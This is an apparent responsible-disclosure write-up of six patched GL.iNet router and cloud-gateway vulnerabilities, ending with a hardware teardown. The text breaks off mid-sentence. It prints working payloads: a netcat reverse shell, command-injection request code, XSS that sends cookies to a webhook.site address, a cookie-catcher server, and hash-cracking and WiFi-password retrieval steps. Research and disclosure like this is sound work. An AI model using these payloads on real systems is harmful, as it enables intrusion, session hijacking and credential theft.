In terms of overall timeline/transparency, I started testing on-and-off between May 2nd, 2022 and June 15th, 2022. After reporting the initial command injection vulnerability, GL.iNET asked if I was interested in monetary compensation to find additional bugs. We ultimately agreed to public disclosure & the release of this blog in exchange for continued testing. As a result, I was given safe passage and continued to act in good faith. Lastly, GL.iNET also shipped me their GL-AX1800 / Flint for additional testing. GL.iNET does not have a BBP or VDP program; I asked, and was given permission to perform the tests I did. In other words, think twice before poking at their infrastructure and being a nuisance.

Having vulnerabilities reported should never be seen as a defeat or failure. Development and security are intertwined in a never ending cycle. There will always be vulnerabilities in all products that take risks on creativity, innovation, and change - the essence of pioneering.

Vulnerabilities List

A total of 6 vulnerabilities were identified in GL.iNet routers and IoT cloud gateway peripheral web applications:

1. OS command injection on router & cloud gateway (CVE-2022-31898)
2. Arbitrary file read on router via cloud gateway (CVE-2022-42055)
3. PII data leakage via user enumeration leading to account takeover
4. Account takeover via stored cross-site scripting (CVE-2022-42054)
5. Account takeover via weak password requirements & lack of rate limiting
6. Password policy bypass leading to single character passwords 

Web Application 

OS Command Injection 

The MT300N-V2 portable router is affected by an OS command injection vulnerability that allows authenticated attackers to run arbitrary commands on the affected system as the application’s user. This vulnerability exists within both the local web interface and the remote cloud interface. It stems from improper validation of input passed through the ping (ping_addr) and traceroute (trace_addr) parameters. The vulnerability affects ALL GL.iNET products’ firmware <= 3.2.12.

Fixed in firmware Version 3.215 stable build (SHA256: 8d761ac6a66598a5b197089e6502865f4fe248015532994d632f7b5757399fc7).

Vulnerability Details

CVE ID: CVE-2022-31898
Access Vector: Remote/Adjacent
Security Risk: High
Vulnerability: CWE-78
CVSS Base Score: 8.4
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

I'll run through the entire discovery process. There exists a file on disk, /www/src/router/router.js, which essentially manages the application panels. Think of it as the endpoint reference in charge of calling different features and functionality. As seen below, the path parameter points to the endpoint containing the router feature's location on disk. When an endpoint such as /attools is fetched, its respective .js, .html, and .css files are loaded onto the page.

Through this endpoint, I quickly discovered that a lot of these panels were not actually accessible through the web UI’s sidebar seen below.

However, the functionality of these endpoints existed and was properly configured and referenced. Visually speaking, within the application they don't have a sidebar "button" or action that can redirect us to them.

Here is a full list of endpoints that cannot be accessed through web UI actions.

http://192.168.8.1/#/ping    <-------- Vulnerable
http://192.168.8.1/#/apitest
http://192.168.8.1/#/attools
http://192.168.8.1/#/smessage
http://192.168.8.1/#/sendmsg
http://192.168.8.1/#/gps
http://192.168.8.1/#/cells
http://192.168.8.1/#/siderouter
http://192.168.8.1/#/rs485
http://192.168.8.1/#/adguardhome
http://192.168.8.1/#/sms
http://192.168.8.1/#/log
http://192.168.8.1/#/process
http://192.168.8.1/#/blelist
http://192.168.8.1/#/bluetooth

I should mention that some of these endpoints do become available after connecting modems, and other peripheral devices to the router. See the documentation for more details https://docs.gl-inet.com/.

As seen above, there exists a ping endpoint. From experience, these are always interesting. This endpoint has the ability to perform typical ping and traceroute commands. Let's quickly confirm that these files exist and that /ping actions get called as defined within the router.js file.

root@GL-MT300N-V2:/www/src/temple/ping# pwd && ls
/www/src/temple/ping
index.CSS  index.html  index.js

The expected usage and output can be seen below.

What's OS command injection? OS command injection is a fairly common vulnerability seen in such endpoints. It's typically exploited by using command operators (|, &&, ;, etc.) that allow you to execute multiple commands in succession, regardless of whether each previous command succeeds.

Looking back at the ping portal, the UI (frontend) sanitizes the user-provided input against the following regex, which is a very common implementation for validating IPv4 addresses.

Therefore, ; isn't an expected IPv4 schema character, so when the pingIP() check is performed, any invalid characters will fail the request.

And we’re presented with the following error message.

We need to feed malicious content into the parameter pingValue. If we do this successfully and don't fail the check, our request will be sent to the web server, where the server application acts upon the input.

To circumvent the input sanitization on the frontend, we will send our POST request to the webserver directly using Burp Suite. This way we can simply modify the POST request without the frontend sanitization being enforced. As mentioned above, using the ; command separator we should be able to achieve command injection through the ping_addr or trace_addr parameters. If I've explained this poorly, perhaps the following visual can help.

Image Credit: I‘m on Your Phone, Listening – Attacking VoIP Configuration Interfaces

Let's give it a try. If you look closely at the POST request below, the ping_addr value is ;/bin/pwd%20, which returned the present working directory of the application user, confirming that OS command injection had been successfully performed.
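To make that concrete, here is a hedged sketch of replaying the request outside the browser with Python; the endpoint path and auth header are assumptions for illustration, and only the ping_addr injection itself comes from the capture above.

import requests

ROUTER = "http://192.168.8.1"
payload = ";/bin/pwd"  # ';' terminates the expected IPv4 value

resp = requests.post(
    f"{ROUTER}/cgi-bin/api/internet/ping",       # hypothetical endpoint
    data={"ping_addr": payload},
    headers={"Authorization": "<admin token>"},  # placeholder auth
    timeout=10,
)
print(resp.text)  # command output is reflected in the response body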

Now let's do an obligatory cat of /etc/passwd by feeding the following input: ;/bin/cat /etc/passwd 2>&1

Okay, let’s go ahead and get a reverse shell.

Payload:
;rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 192.168.8.193 4000 >/tmp/f

URL encoded:
;rm%20/tmp/f;mknod%20/tmp/f%20p;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|/usr/bin/nc%20192.168.8.193%204000%20%3E/tmp/f

Cool, but this attack scenario kinda sucks… we need to be authenticated, on the same network, etc. One of the main reasons I think this is a cool find, and why it's not simply a local attack vector, is that we can configure our device with the vendor's IoT cloud gateway! This cloud gateway allows us to deploy and manage our connected IoT gateways remotely.

I've discovered that there are roughly ~30,000 devices configured this way. One of the features of this cloud management portal is the ability to access your device's admin panel remotely through a public-facing endpoint. This can be seen below.

As you may have guessed, command injection could be performed from this endpoint as well.

In theory, any attacker with the ability to hijack goodcloud.xyz user sessions or compromise a user account (both achieved in this blog) could potentially leverage this attack vector to gain a foothold on the network.

Additional things you can do (a request sketch follows this list):

Scan the internal network:
GET /cgi-bin/api/repeater/scan

Obtain the WiFi passwords of joined SSIDs:
GET /cgi-bin/api/repeater/manager/list

Obtain the WiFi passwords of the router's SSIDs:
GET /cgi-bin/api/ap/info
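A hedged sketch of hitting those endpoints in one go; the paths are the ones listed above, while the session/token handling is a placeholder assumption:

import requests

ROUTER = "http://192.168.8.1"
session = requests.Session()
session.headers["Authorization"] = "<admin token>"  # placeholder auth

for path in ("/cgi-bin/api/repeater/scan",
             "/cgi-bin/api/repeater/manager/list",
             "/cgi-bin/api/ap/info"):
    r = session.get(ROUTER + path, timeout=10)
    print(path, r.status_code, r.text[:200])  # truncated for readability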

Disclosure Timeline 

May 2, 2022: Initial discovery
May 2, 2022: Vendor contacted
May 3, 2022: Vulnerability reported to the vendor
May 10, 2022: Vulnerability confirmed by the vendor
July 6, 2022: CVE reserved
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


Arbitrary File Read

The MT300N-V2 portable router, configured alongside the vendor's cloud management gateway (goodcloud.xyz), is vulnerable to arbitrary file read. The remote cloud gateway is intended to facilitate remote device access and management. This vulnerability exists within the cloud manager web interface and is only available as a feature to enterprise users. The device editing interface's tools harbor the ping and traceroute functionality, which is vulnerable to a broken type of command injection whose behavior is limited to performing arbitrary file reads. Successful exploitation of this vulnerability will allow an attacker to access sensitive files and data on the router. It is possible to read any arbitrary file on the file system, including application source code, configuration, and other critical system files.

Vulnerability Details

CVE ID: CVE-2022-42055
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-23 & CWE-25
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Enterprise users will have the TOOLS menu when editing their devices, as seen below.

The ping_addr and trace_addr parameters both allow you to read any file on disk when prepending ;/bin/sh to the file you want to read.

I'm not sure why this happens. I have not been able to get regular command injection due to the way it's calling ping and traceroute within busybox, from what I assume is data passing through something similar to an ngrok tunnel. I can't use funky delimiters or common escapes to simply comment out the rest of the operation. Anyhow, valid payloads would look like the following:

;bin/sh%20/<PATH_TO_FILE>

&bin/sh%20/<PATH_TO_FILE>

As a POC I've created a flag.txt file in /tmp on my router, and I'm going to read it from the cloud gateway. I could just as easily read the passwd and shadow files. Successfully cracking them offline would allow me access to both the cloud SSH terminal and the login UI.

Funny enough, this action can then be seen getting processed by the logs on the cloud gateway. So definitely not "OPSEC" friendly.

Disclosure Timeline 

May 25, 2022: Initial discovery
May 25, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


PII Data Leakage & User Enumeration 

The MT300N-V2 portable router can be configured alongside the vendor's cloud management gateway (goodcloud.xyz), which allows for remote access and management. This vulnerability exists within the cloud manager web interface, through the device-sharing cloud-api/cloud/user/get-user?nameoremail= GET request. Successful enumeration of a user will result in that user's PII being disclosed. At its core, this is a funky IDOR. The vulnerability affected goodcloud.xyz prior to May 12th, 2022.

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-200 & CWE-203
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

I identified roughly ~30,000 users, which were enumerated via their username or email address. Successful enumeration compromises the confidentiality of the user. This vulnerability returns sensitive information that could be leveraged by a sophisticated and motivated attacker to compromise the user's account credentials.

This attack is performed after creating a regular goodcloud.xyz cloud gateway account and linking your GL.iNet device. In the image below we see that our device can be shared with another registered user.

The request and response for sharing a device with another user are seen below.

Performing this get-user request against an existing user will disclose the following account information:

- company name
- account creation time
- credential's salt (string+MD5)
- account email
- account user ID
- last login time
- nickname
- password hash (MD5)
- phone number
- password salt (MD5)
- secret key
- security value (boolean)
- status value (boolean)
- account last updated time
- application user id
- username

The password appears to be an MD5 HMAC, but the actual formatting/order is unknown, and not something I deem necessary to figure out. That being said, given all the information retrieved from the disclosure, I believe the chances of finding the right combination are fairly high. Below is an example of how it could be retrieved.
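As a hedged illustration of what that search could look like (the real goodcloud.xyz scheme is unknown, so these orderings are guesses):

import hashlib
import hmac

def md5_candidates(password: str, salt: str):
    """Yield a few plausible salt/password combinations."""
    p, s = password.encode(), salt.encode()
    yield hashlib.md5(p + s).hexdigest()
    yield hashlib.md5(s + p).hexdigest()
    yield hmac.new(s, p, hashlib.md5).hexdigest()
    yield hmac.new(p, s, hashlib.md5).hexdigest()

leaked_hash = "<hash from the get-user response>"  # placeholder
leaked_salt = "<salt from the get-user response>"  # placeholder

for guess in ("password123", "qwerty", "admin2022"):
    if leaked_hash in set(md5_candidates(guess, leaked_salt)):
        print("recovered password:", guess)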

Additionally, I discovered no rate-limiting mechanisms in place for sharing devices. Therefore, it's relatively easy to enumerate a good majority of valid application users using Burp Suite Intruder.

Another observation I made, which was not confirmed with the vendor (so is purely speculation): I noticed that not every user had a secret value associated with their account. I suspect that this secret code is actually leveraged for the 2FA QR code creation mechanism. The syntax would resemble something like this:

https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/<USER HERE>?secret=<SECRET HERE>&issuer=goodcloud.xyz

This is purely speculative. 
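If that speculation held, deriving live 2FA codes from a leaked secret would be a few lines with the third-party pyotp library; everything here, including the assumption that the secret is a base32 TOTP seed, is hypothetical:

import pyotp

secret = "<secret from the get-user response>"  # speculative TOTP seed
totp = pyotp.TOTP(secret)
print(totp.now())  # current 6-digit code, if the guess is right
print(totp.provisioning_uri(name="<USER>", issuer_name="goodcloud.xyz"))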

The GL.iNET team was extremely quick to remediate this issue. Less than 12 hours after reporting it, a fix was applied, as seen below.

Disclosure Timeline 

May 11, 2022: Initial discovery
May 11, 2022: Vendor contacted & vulnerability reported
May 11, 2022: Vendor confirms vulnerability
May 12, 2022: Vendor patched the vulnerability


Stored Cross-Site Scripting

The MT300N-V2 portable router can join itself to the remote cloud management configuration gateway (goodcloud.xyz), which allows for remote management of linked IoT devices. There exist multiple user input fields that do not properly sanitize user-supplied input. As a result, the application is vulnerable to stored cross-site scripting attacks. If this attack is leveraged against an enterprise account through the Sub Account invitation, it can lead to account takeover of the joined accounts.

Vulnerability Details

CVE ID: CVE-2022-42054
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-79
CVSS Base Score: 8.7
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:H

We'll find the vulnerable input fields in the "Group Lists" panel, in which a user can modify and create as many groups as they want.

The vulnerable fields are Company and Description. The payloads I used as a proof of concept are the following:

<img src=x onerror=confirm(document.cookie)>

or

<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#46;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65;&#x29;>

Once the group is saved, the XSS will trigger anytime the user logs in, switches regions (Asia Pacific, America, Europe), or switches organizations, as seen below.

This occurs because there is a listQuery key that checks for {"pageNum":"","pageSize":"","name":"","company":"","description":""}, and our XSS is stored and referenced within the company name & description fields, which is how the XSS triggers.

Can this be used maliciously? Unfortunately, not with regular user accounts; with enterprise accounts, yes, as we'll see later. Here's why: realistically, the only way to leverage this would be to share a device with maliciously named company and description fields with another user.

Even with the patch for the PII and user enumeration vulnerability above, it is still possible to enumerate userIDs, which is exactly what we need to send a shared-device invitation to users. Below is an example request.

An attacker with a regular user account would create a group with a company or description name like <script type="text/javascript">document.location="http://x.x.x.x:xxxx/?c="+document.cookie;</script>, then invite a victim to that group. When the victim logs in, the attacker would be able to steal their session. Unfortunately, with a regular user account this isn't possible.

If we share the device from boschko (attacker) to boschko1 (victim), here's how the chain would go: after boschko creates the malicious group and sends an invitation to boschko1, he's done. The victim boschko1 would log in and receive the invite from boschko, as seen below.

However, when we sign out and back into boschko1, no XSS triggered. Why? It's because there is a difference between being a member of a shared group (a group another user shared with you) and being the owner (you created the group and shared it), as can be seen below.

As seen above, a member of a shared group won't have the malicious fields of the group translated to their "frontend".

HOWEVER! If you have a business/enterprise account, or are logged in as a business/enterprise user, you can leverage this stored XSS to hijack user sessions! All thanks to features only available to business users :).

Business features provide the ability to add "Sub Accounts". You can think of this as having the ability to enroll staff/employees into your management console/organization. If a user accepts our subAccount invitation, they become a staff member inside of our "organization". In doing so, we'll have the ability to steal their fresh session cookies after they log in, because they'd become owners of the malicious group by association.

Let’s take this one step at a time. The Subscription Account panel looks like this.

I’m sure you can make out its general functionality. After inviting a user via their email address they will receive the following email.

I'll try and break this down as clearly as I can.

  • User A (attacker) is boschko, in red highlights.
  • User B (victim) is boschko1, in green highlights.

  1. Step 1: Create a malicious company as boschko, with the XSS in the company name and description.
  2. Step 2: Invite boschko1 to the malicious company as boschko.
  3. Step 3: Get boschko1's cookies and use them to log in as him.

Below is the user info of boschko, who owns the company/organization test. He also owns the "Group List" happy company, a group which is part of the test organization.

boschko1 has been sent an invitation email from boschko. boschko1 has accepted and has been enrolled into boschko's test organization. boschko1 has been given Deployment Operator level access over the organization.

Logged into boschko1, the user would see the following two "workspaces": his personal boschko1 (mine), and the one he has been invited to, test.

When boschko1 is signed into his own team/organization, boschko1 (mine), nothing bad happens if devices are shared with him.

When boschko1 signs into the test organization that boschko owns via Switch Teams, the malicious company and description are properly referenced/called upon by the listQuery action.

The stored XSS in the malicious test company's company and description fields (members of the happy company Group List) gets triggered when boschko1 is signed into boschko's organization test.

From our malicious boschko user, we will create a group with the following malicious company and description names:

<img src=x onerror=this.src='https://webhook.site/6cb27cce-4dfd-4785-8ee8-70e932b1b8ca?c='+document.cookie>

We can leverage webhook.site since we're too lazy to spin up a DigitalOcean droplet. With this webhook in hand, we're ready to steal the cookies of boschko1.

Above, boschko has stored the malicious JavaScript within his company and description fields. Now simply log boschko1 into the test organization owned by boschko, and receive the cookies via the webhook.
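If you'd rather not rely on webhook.site, a minimal self-hosted catcher works too; this sketch just logs the c query parameter that the payload above appends:

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        # The XSS payload appends "?c=<document.cookie>" to the request.
        qs = parse_qs(urlsplit(self.path).query)
        print("stolen cookies:", qs.get("c", ["<none>"])[0])
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8000), CookieCatcher).serve_forever()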

As seen below, we get a bunch of requests containing the session cookies of boschko1.

Using the stolen boschko1 session cookies, the account can be hijacked.

The GL.iNET team remediated the issue by July 15 with some pretty solid/standard filtering.

I attempted a handful of bypasses with U+FF1C and U+FF1E, some more funky keyword filtering, substrings, array methods, etc., and had no success bypassing the patch.

Disclosure Timeline 

May 12, 2022: Initial discovery
May 12, 2022: Vendor contacted & vulnerability reported
May 13, 2022: Vendor confirms vulnerability
May 19, 2022: Contact vendor about enterprise user impact
July 7, 2022: Follow up with the vendor
July 15, 2022: Vendor patched the vulnerability


Weak Password Requirements & No Rate Limiting

The MT300N-V2 portable router can join itself to the remote cloud management configuration gateway, with its accounts created through goodcloud.xyz, which allows for remote management of linked IoT devices. The login for goodcloud.xyz was observed to have no rate limiting. Additionally, user passwords require only a minimum of 6 characters, with no special characters or password policy. This makes it extremely simple for an attacker to brute force user accounts, leading to account takeover.

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

As seen below, when users create their goodcloud.xyz cloud gateway accounts, they're only required to have a password of 6 or more characters, with no capitalization or special characters being required or enforced.

Additionally, due to there being no rate limiting on login attempts, it's trivial to spray users or brute force user accounts using Burp Suite Intruder.

Below is an example of successfully obtaining the password for a sprayed user.

In total, I was able to recover the passwords of 33 application users. I never tested these credentials to log into the UI, for obvious ethical reasons. All the data was reported back to the GL.iNET team.

Disclosure Timeline 

May 18, 2022: Initial discovery
May 24, 2022: Vendor contacted & vulnerability reported
May 24, 2022: Vendor confirms vulnerability
June 7, 2022: Vendor implements rate-limiting, patching the vulnerability


Password Policy Bypass

The MT300N-V2 portable router can join itself to the remote cloud management configuration gateway (goodcloud.xyz), which allows for remote management of linked IoT devices. For these cloud gateway accounts, while password complexity requirements were implemented on the original signup page, they were not added to the password reset page. Combined with the lack of rate limiting, this severely impacts the security posture of the affected users.

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

The reset password policy isn't consistent with the registration and change password policies. As a result, it's possible to bypass the 6-character password requirement and set a single-character password. In general, the application should validate that the password contains alphanumeric and special characters, with a minimum length of around eight. Additionally, I feel it's best practice not to allow users to set a previously used password as the new password.
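A minimal sketch of the kind of consistent server-side check being suggested here (the exact policy is my suggestion, not the vendor's):

import re

def password_ok(pw: str) -> bool:
    """Require >= 8 chars with a letter, a digit, and a special char."""
    return (len(pw) >= 8
            and bool(re.search(r"[A-Za-z]", pw))
            and bool(re.search(r"\d", pw))
            and bool(re.search(r"[^A-Za-z0-9]", pw)))

assert not password_ok("1")           # the single-char reset shown below
assert password_ok("c0rrect-h0rse!")  # passes all character classes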

As seen below, through the UI the password change has checks on the client side to ensure the password policy is respected.

In Burp Suite we can intercept the request and manually set it to a single character.

The request above was submitted successfully, and the new password for the boschko user has been set to 1. The request below is the login request; as you can see, it was successful.

Disclosure Timeline 

May 26, 2022: Initial discovery
May 26, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
July 15, 2022: Vulnerability has been patched


Additional Interesting Finds 

I made a few interesting discoveries that I don’t consider vulnerabilities. 

Before we jump into this one, we have to quickly talk about ACL configuration. Basically, for rpc, having appropriate access control over the invocations the application can make is very important. These methods should be strictly controlled. For more information on this, refer to the Ubus wiki.

Once we've installed OpenWrt as seen above, the application will generate the list of rpc invocation methods for OpenWrt, which is defined within the ACL configuration file /usr/share/rpcd/acl.d/luci-base.json. Here is a snippet of the file in question.

...
	"luci-access": {
		"description": "Grant access to basic LuCI procedures",
		"read": {
			"cgi-io": [ "backup", "download", "exec" ],
			"file": {
				"/": [ "list" ],
				"/*": [ "list" ],
				"/dev/mtdblock*": [ "read" ],
				"/etc/crontabs/root": [ "read" ],
				"/etc/dropbear/authorized_keys": ["read"],
				"/etc/filesystems": [ "read" ],
				"/etc/rc.local": [ "read" ],
				"/etc/sysupgrade.conf": [ "read" ],
				"/etc/passwd": [ "read" ],
				"/etc/group": [ "read" ],
				"/proc/filesystems": [ "read" ],
...
		"write": {
			"cgi-io": [ "upload" ],
			"file": {
				"/etc/crontabs/root": [ "write" ],
				"/etc/init.d/firewall restart": ["exec"],
				"/etc/luci-uploads/*": [ "write" ],
				"/etc/rc.local": [ "write" ],
				"/etc/sysupgrade.conf": [ "write" ],
				"/sbin/block": [ "exec" ],
				"/sbin/firstboot": [ "exec" ],
				"/sbin/ifdown": [ "exec" ],
...

Not being a subject matter expert, I would nevertheless say that the above methods are well-defined. Methods in the file namespace aren't simply "allow all" ("file": [ "*" ]); if that were the case, then this would be an actual vulnerability.

rpcd also has a defined user in /etc/config/rpcd that we can use for the management interface. This user is used to execute code through a large number of rpcd-exposed methods.

With this information in hand, we should be able to log in with these credentials. As a result, we will obtain a large number of methods that can be called, and get the ubus_rpc_session.
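A hedged sketch of that login against the standard OpenWrt /ubus JSON-RPC endpoint; the request framing is standard ubus-over-HTTP, while the credentials are placeholders for the values found in /etc/config/rpcd:

import requests

UBUS = "http://192.168.8.1/ubus"
NULL_SESSION = "00000000000000000000000000000000"

def ubus_call(session, namespace, method, args):
    req = {"jsonrpc": "2.0", "id": 1, "method": "call",
           "params": [session, namespace, method, args]}
    return requests.post(UBUS, json=req, timeout=10).json()

# Log in with the rpcd user to obtain a ubus_rpc_session token.
login = ubus_call(NULL_SESSION, "session", "login",
                  {"username": "<rpcd user>", "password": "<rpcd password>"})
token = login["result"][1]["ubus_rpc_session"]

# The token then authorizes other ACL-permitted calls, e.g. the
# /etc/passwd read primitive granted by luci-base.json.
print(ubus_call(token, "file", "read", {"path": "/etc/passwd"}))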

As seen in the following image, this ubus_rpc_session value is used to call other methods defined in ACL config files.

Now we might look at the image above and think we have RCE of sorts. However, for some weird reason, /etc/passwd is actually defined with valid read primitives within the luci-base.json ACL config file.

As seen below, attempting to read any other files will result in a failed operation.

I simply found this interesting hence why I am writing about it.

Hardware Teardown 

Let’s actually start the intended project! The GL-MT300N router looks like this:

It's nothing fancy: the device has a USB port, two Ethernet ports (LAN & WAN), a reset button, and a mode switch. Let's break it open and see what hardware we have on hand.

Immediately, there are some interesting components. There looks to be a system on a chip (SoC), SPI flash, and some SDRAM. There is also a serial port, what looks like it could potentially be JTAG, and almost definitely UART.

In terms of chipsets, there is a MediaTek MT7628NN chip, which is described as a "router on a chip". The datasheet shows it is basically the CPU, and it supports the requirements of an entry-level AP/router.

Looking at the diagram of the chip, there is communication for UART, SPI, and I2C, which are required to transfer data. This also confirms that this chip has a serial console that can be used for debugging. If it is still enabled, this could allow us to access the box while it's running and potentially obtain a shell on the system.

The second chip is the Macronix MX25L12835F SPI serial flash chip; this is what I attacked for most of the reversing process to obtain the application's firmware. The serial flash usually contains the configuration settings and file systems, and is generally the storage for devices lacking peripherals. Looking around on the board, there is no other "storage device".

The third and last chip is the Etron Technology EM68C16CWQG-25H, which is the RAM used by the device when it is running.

Connecting to UART

Let's quickly go over what UART is. UART is used to send and receive data from devices over a serial connection. This is done for purposes such as updating firmware manually, debugging, or interfacing with the underlying system (kind of like opening a new terminal in Ubuntu). UART works by communicating through two wires, a transmitter wire (TX) and a receiver wire (RX), to talk to the microcontroller or system on a chip (basically the brains of the device) directly.

The receiver and transmitter, marked RX and TX respectively, need to connect to a second UART device's TX and RX in order to establish communication. I'm lucky enough to have received my Flipper Zero, so I'll be using it for this!

If you would like more in-depth information on UART see my blog on hacking a fertility sperm tester. We’ll connect our Flipper Zero to the router UART connection as seen below.

The result will be a little something like this.

Since I'm a Mac user, connecting to my Flipper Zero via USB will "mount" or make the device accessible at /dev/cu.usbmodemflip*, so if I want to connect to it, all I need to do is run the command below.

Once I've run the screen command and the router is powered on, I'll start seeing serial output, confirming that I've properly connected to UART.

As you can see, I've obtained a root shell. Unprotected root access via UART is technically a vulnerability (CWE-306). Connecting to the UART port drops you directly into a root shell and exposes an unauthenticated Das U-Boot BIOS shell. This isn't something you see too often; UART is commonly locked down. However, "exploitation" requires physical access: the device needs to be opened, with wires connected to the RX, TX, and GND pads on the main logic board. GL.iNET knows about this and, to my knowledge, doesn't plan on patching it. This is understandable, as there's no "real" impact.

I'll go on a "quick" rant about why unprotected UART CVEs are silly. The attack requires physical access to the device. So an attacker has to be on-site, most likely inside a locked room where networking equipment is located, probably monitored by CCTV… The attacker must also attach an additional USB-to-UART component to the device's PCB in order to gain console access. Since physically dismantling the device is required to fulfill the attack, I genuinely don't consider this oversight from the manufacturer a serious vulnerability. Obviously, it's not great, but realistically these types of things are at the vendor's discretion. Moreover, even when protections are in place to disable the UART console and/or the wide debug pads are removed from the PCB, there are many tricks one can use to get around those mechanisms.

Although personally, I believe it’s simply best practice for a hardware manufacturer to disable hardware debugging interfaces in the final product of any commercial device. Not doing so isn’t worthy of a CVE.

Getting back on track. Hypothetically if we were in a situation where we couldn’t get access to a shell from UART we’d likely be able to get one from U-Boot. There are actually a lot of different ways to get an application shell from here. Two of those techniques were covered in my blog Thanks Fo’ Nut’in — Hacking YO’s Male Fertility Sperm Test so I won’t be covering them here.

Leveraging the SPI Flash

Even though the serial console is enabled, if it weren’t, and we had no success getting a shell from U-Boot, our next avenue of attack might be to extract the firmware from the SPI flash chip. 

The goal is simple: read the firmware from the chip. There are a few options, like using clips with a universal bus interface device, desoldering the chip from the board and connecting it to a specialized EPROM read/write device, or attaching it to a protoboard. I like the first option, and I prefer SOIC8 clips over hook clips.

At a minimum, we'll need a hardware tool that can interact with at least an SPI interface. I'm a big fan of the Attify Badge, as it's very efficient and supports many interfaces like SPI, UART, JTAG, I2C, GPIO, and others. But you could use other devices like a professional EPROM programmer, a Bus Pirate, a BeagleBone, a Raspberry Pi, etc.

Below is the pinout found on the datasheet for our Macronix MX25L12835F flash.

All you need to do is make the proper connections from the chip to the Attify badge. I’ve made mine according to the diagram below.

OK. I spent a solid two nights trying to dump the firmware, without success. I tried the Bus Pirate, Shikra, Attify Badge, and a BeagleBone Black, but nothing seemed to work. Flashrom appears to be unable to read the data or even identify the chip, which is really weird. I've confirmed the pinouts are correct from the datasheet and, as seen below, flashrom supports this chip.

Attempting to dump the firmware results in the following.

So what's going on? I'm not an EE, so I had to do a lot of reading and talking to extremely patient people. Ultimately, I suspect this is happening because there is already contention for the SPI bus (from the MediaTek MT7628NN chip), and due to the nature of what we're attempting, the flash is receiving two master connections and ours is not taking precedence. Currently, the MCU on the board is the master of the SPI chip; that's where all the communication is going to and from. I wasn't able to find a way to intercept, short, or stop that communication to make our Attify Badge the master. In theory, a trick to get around this would be to hold down the reset button while reading the flash and just hope to get lucky (I did this for ~2 hours and had no luck). Since our Attify Badge would already be powered on, it could "IN THEORY" take precedence. This could, again "in theory", stop the chip from mastering to the MCU. But I haven't been able to do so properly. I've spent ~8 hours on this, trying out multiple pieces of hardware (Pi, BeagleBone, Attify, Bus Pirate) without success. I also suspect that being on a MacBook Pro with funky USB adapters could be making my situation worse.

Okay, we're left with no other option than to go "off-chip". As previously mentioned, there are multiple ways to dump the contents of flash memory. Let's try desoldering the component from the board and using a chip reprogrammer to read off the contents.

My setup is extremely cheap and very sub-optimal. I don't own a fixed hot air station or PCB mount; I'm just using a loose heat gun.

Our goal is to apply enough heat so that the solder joints melt. We need to extract the chip with tweezers without damaging components. Easier said than done with my shitty station. Differential heating on the board can be an issue: when a jet of hot air is applied to a PCB at room temperature, most of the heat is diffused to the colder spots, making the heating of the region of interest poor. To work around this, you might think that increasing the heat will solve all of our issues. However, simply increasing the temperature is dangerous and not advisable.

When a component is put under increased thermal stress, the temperature gradient increases along the board. The temperature difference on the board will produce thermal expansion in different areas, producing mechanical stress that may damage the board and break or shift components. Not good. My setup is prone to this type of error because I don't have a mounting jig for the heat gun that can control distance, and I don't have any high-temperature tape I can apply to the surrounding components so that they don't get affected by my shaky hand controlling the heat source.

Regardless, for most small components, a preheating temperature of 250 °C should be enough.

After a few minutes, I was able to get the chip off. However, there was a tiny shielded inductor or resistor that was affected by the heat and shifted when I removed the SPI chip with the tweezers. I wasn't able to get this component back on the board. Fuck. I'm not an EE, so I don't fully understand the impact and consequences of this.

Let's mount the SPI chip onto a SOP8 socket, which we'll then connect to our reprogrammer. Below is the orientation of the memory in the adapter.

This is, once again, quite a shitty reprogrammer. I actually had to disable driver signing to get the USB connection recognized after manually installing the shady driver. We'll go ahead and configure our chip options, knowing our SPI chip is a Macronix MX25L12835F.

However, this also failed and couldn't do any reads. I spent another ~5 hours debugging this. I thought it was the SOP socket clip, so I soldered the chip onto a board and relayed the links to the reprogrammer, but the results were the same.

After a while, I went ahead and re-soldered it to the main router PCB, and the device was fully bricked. To be quite honest, I'm not sure what I did wrong or at which step I made the mistake.

They say that failure is another stepping stone to greatness, but given that the entire reason for this purchase was to try out some new hardware hacking methodologies…. this was very bittersweet. 

I remembered the squashfs information displayed in the UART log output. So, if we really wanted to reverse the firmware, it's still possible: you can grab the unsigned firmware from the vendor's site. Below are the steps you'd follow, as if you had successfully extracted the firmware, to get to the filesystem.
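A hedged sketch of those steps using binwalk and unsquashfs; the image name and the carved squashfs file name are placeholders, since binwalk's output naming varies per image:

import subprocess

fw = "gl-mt300n-v2-3.212.bin"  # placeholder: the unsigned vendor image

# Carve the image; binwalk drops sections into _<name>.extracted/.
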